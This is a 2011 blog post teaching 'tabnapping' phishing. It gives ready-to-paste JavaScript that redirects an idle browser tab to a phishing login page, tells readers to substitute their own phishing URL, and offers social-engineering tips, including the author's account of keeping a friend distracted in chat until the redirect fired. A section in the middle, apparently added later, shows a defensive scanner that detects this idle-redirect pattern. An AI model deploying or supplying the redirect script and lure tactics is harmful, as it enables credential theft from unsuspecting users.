Sunday, July 24, 2011

Tab Napping (Phishing Attack)

Theory Behind Tabnapping (please read this to understand)
How many times have you opened several tabs and forgotten to go back to the others? Because of this inattention on the victim's part, a hacker can redirect the idle tab to their phishing page. And in many cases the victim doesn't bother to check the URL of the page. In simple words, it's just a trick to confuse a user who has multiple tabs open.
You may be wondering why anyone would log in to a page he or she didn't request. Well, I want to ask one question: what will you do if you have a Facebook login page in front of you? It's our nature.


Tabnapping is done with JavaScript. It's all about the relation between two pages, say pageA and pageB. Consider pageA to be the page that is open in a tab and pageB to be our phishing page. By some mechanism pageA must be redirected to pageB (the phishing page), so how is it done?

The first thing we can do is use JavaScript's setInterval() function.
Example: timerRedirect=setInterval("location.href='http://www.gmail.com'",10000); Specify this in the script section; it will not affect the rest of the code. Its job is to redirect the page to gmail.com after 10 seconds.
But you need to redirect the page only if it is idle, so how to do that? Don't worry, I have the code for that: just copy and paste the code below into the "head" section of your page (pageA in this example). Note: replace gmail.com with your phishing page URL.


JavaScript (copy it into the head section)
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
  if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  else if (typeof window.pageYOffset != "undefined"){
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  //else do nothing
}
function pollActivity(){
  if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
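
From the defender's side, the script above has a recognizable shape: a timer that navigates to another origin, reset by user-activity handlers so that it only fires in an idle tab. The following is an added example, not part of the original post, of a heuristic scanner for that shape in inline script; findIdleRedirects, the sample strings and the blog.example URL are assumptions made for illustration.

```javascript
// Added example: heuristic scanner for the idle-timer redirect pattern.
// All names here (findIdleRedirects, SAMPLE_*) are hypothetical.

// A timer call: callback text (string or function) followed by a numeric delay.
const TIMER = /set(?:Interval|Timeout)\s*\(([\s\S]{0,400}?),\s*(\d+)\s*\)/g;
// A navigation sink inside the callback: location = / location.href = / assign() / replace().
const NAV = /\blocation(?:\.href)?\s*=\s*\\?["'`]([^"'`\\]+)|\blocation\.(?:assign|replace)\s*\(\s*\\?["'`]([^"'`\\]+)/;
// Handlers that let a script tell "user is active" from "tab is idle".
const ACTIVITY = /\.on(?:mousemove|keydown|click|scroll)\s*=|addEventListener\s*\(\s*["'](?:mousemove|keydown|click|scroll|blur|visibilitychange)/;
const RESET = /clear(?:Interval|Timeout)\s*\(/;

function findIdleRedirects(scriptSource, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  // Activity handlers plus a timer reset mean the redirect is gated on idleness.
  const idleGated = ACTIVITY.test(scriptSource) && RESET.test(scriptSource);
  const findings = [];
  for (const m of scriptSource.matchAll(TIMER)) {
    const nav = NAV.exec(m[1]);
    if (!nav) continue; // this timer does not navigate
    let target;
    try { target = new URL(nav[1] || nav[2], pageUrl); } catch { continue; }
    const crossOrigin = target.origin !== pageOrigin;
    findings.push({
      target: target.href,
      delayMs: Number(m[2]),
      crossOrigin,
      idleGated,
      suspicious: crossOrigin && idleGated, // both signals together match this page's script
    });
  }
  return findings;
}

// Constructed sample 1: same shape as the script on this page.
const SAMPLE_IDLE = `
function initRedirect(){
  clearInterval(timerRedirect);
  timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);
}
document.onmousemove=initRedirect;
document.onkeydown=initRedirect;`;

// Constructed sample 2: an ordinary same-origin refresh with no idle gating.
const SAMPLE_BENIGN = `setTimeout(function(){ location.href = '/dashboard'; }, 30000);`;

const report = (src) => findIdleRedirects(src, 'https://blog.example/article.html');
console.log(report(SAMPLE_IDLE), report(SAMPLE_BENIGN));
```

This is a text heuristic, so obfuscated or dynamically built script will evade it; it is meant for triaging user-submitted or hosted pages, not as a replacement for checking the address bar before entering credentials.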


Upload your page with the JavaScript to a website. Now the only thing you have to do is give him your page (pageA). A little tip: don't let him close your page. Keep an interesting article, a bunch of funny pictures or anything else interesting on it, and make the article a bit lengthy so that the victim doesn't finish it in one go (again, use your head).


I would rather like to share how I applied this technique: I shared the link to my page (an article with the above JavaScript included) while chatting with a friend, and I just made him read my article. While he was reading I started sending messages in the chat box, so he had to come and answer me, right? All I had to do was keep him in the chat for a minute or two, and my job was done.
